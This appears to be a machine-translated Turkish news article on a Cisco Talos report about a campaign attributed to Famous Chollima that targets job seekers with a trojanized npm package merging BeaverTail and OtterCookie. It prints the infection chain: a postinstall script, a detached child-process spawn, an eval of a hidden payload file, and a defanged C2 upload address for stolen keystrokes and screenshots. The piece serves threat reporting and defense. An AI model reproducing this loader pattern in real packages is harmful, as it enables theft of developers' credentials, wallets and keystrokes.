
Chessfi adlı truva atı haline getirilmiş bir Node.js uygulamasıyla iş arayanları hedef alan yeni bir bilgi hırsızı ortaya çıktı.
Resmi depoda barındırılan değiştirilmiş bir npm paketi aracılığıyla sunulan kötü amaçlı yazılım, önceden ayrı olan iki aracı (BeaverTail ve OtterCookie) birleşik bir JavaScript yükünde harmanlıyor.
Kurbanlar sahte istihdam teklifleriyle kandırılıyor ve bir kodlama değerlendirmesi kisvesi altında uygulamayı yüklemeleri isteniyor; bu da bilmeden kimlik bilgilerini, kripto para cüzdanlarını ve kullanıcı etkinliklerini toplayan kötü amaçlı komut dosyalarını tetikliyor.
Cisco Talos analistleri, güvenliği ihlal edilmiş bir sistemden gelen olağandışı giden trafiği araştırırken kampanyayı tespit etti.
Node-nvm-ssh paketindeki kurulum sonrası komut dosyasının, büyük bir JavaScript yükünün gizliliğini kaldıran ve değerlendiren gizli bir alt süreç ürettiğini buldular.
.webp)
Bu veri, BeaverTail’in tarayıcı uzantısı numaralandırmasını ve InvisibleFerret Python indiricisini OtterCookie’nin uzak kabuğu, dosya sızdırma, pano ve şimdi keylogging modülleriyle birleştirir.
Birleştirilen kötü amaçlı yazılım yürütüldükten sonra, soket.io üzerinden bir komut ve kontrol sunucusuyla bağlantı kurar.
Saldırgan uzaktan komutlar verebilir, çok çeşitli desenlerle eşleşen dosyaları çalabilir. .env
Ve .docx
kripto para birimi uzantı dizinlerine gidin ve kabuk komutlarını çalıştırın.
Bu arada, keylogging bileşeni her tuş vuruşunu yakalar ve bunları pano içeriğiyle birlikte C2 sunucusuna yüklemeden önce periyodik masaüstü ekran görüntülerini alır.
Sürekli ağ etkinliği
Etkilenen sistemler, yüksek numaralı TCP bağlantı noktalarında (genellikle Socket.io için 1418 ve keylog yüklemeleri için 1478) sürekli ağ etkinliği gösterir.
Kötü amaçlı yazılım, adlı geçici bir klasör oluşturur. windows-cache
ve tuş vuruşlarını yazar 1.tmp
her saniye, ekran görüntüleri şu şekilde kaydedilir: 2.jpeg
her dört saniyede bir.
Node.js paketlerini kullanma node-global-key-listener
, screenshot-desktop
Ve sharp
modül, önemli olaylar için dinleyicileri yapılandırır ve ekran görüntüsü yakalamalarını planlar, ardından verileri paketleyip hxxp://172.86.88.188:1478/upload adresine gönderir.
.webp)
Kimlik bilgileri hırsızlığı ve uzak kabuk erişimine ek olarak, kampanyanın bulaşma mekanizması tespitten kaçınmak için çok aşamalı bir zincir kullanıyor. Depoyu klonladıktan sonra kötü amaçlı bir postinstall
komut dosyası package.json
yürütür skip
senaryo:
"scripts": {
"postinstall": "npm run test npm run transpile npm run skip"
}
skip
komut çağırır node testfixtures/eval
varsayılan olarak yüklenen index.js
. Bu komut dosyası, çalışan bağımsız bir alt süreci ortaya çıkarır file15.js
:
const filePath = path.join(__dirname, 'node_modules', 'file15.js');
const child = spawn(process.execPath, [filePath], { detached: true, stdio: 'ignore' });
Nihayet, file15.js
içeriğini okur ve değerlendirir test.list
kullanarak eval
birleştirilmiş BeaverTail ve OtterCookie modüllerini ortaya koyuyor:
const fs = require('fs');
const path = require('path');
const filePath = path.join(__dirname, 'test.list');
fs.readFile(filePath, 'utf8', (err, data) => { eval(data); });
Git deposunun klonlanması, zararsız görünen npm komut dosyalarının çalıştırılması, gizli süreçlerin oluşturulması ve gizlenmiş bir veri yükünün dinamik olarak değerlendirilmesi gibi karmaşık zincir, karmaşık enfeksiyon mekanizmasının altını çiziyor.
Famous Chollima, BeaverTail’in gizli Python yük indiricisi ile OtterCookie’nin modüler bilgi hırsızını birleştirerek, şüphelenmeyen kurbanları tehlikeye atmak için tanıdık geliştirici iş akışlarından yararlanan çok yönlü bir kötü amaçlı yazılım geliştirdi.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.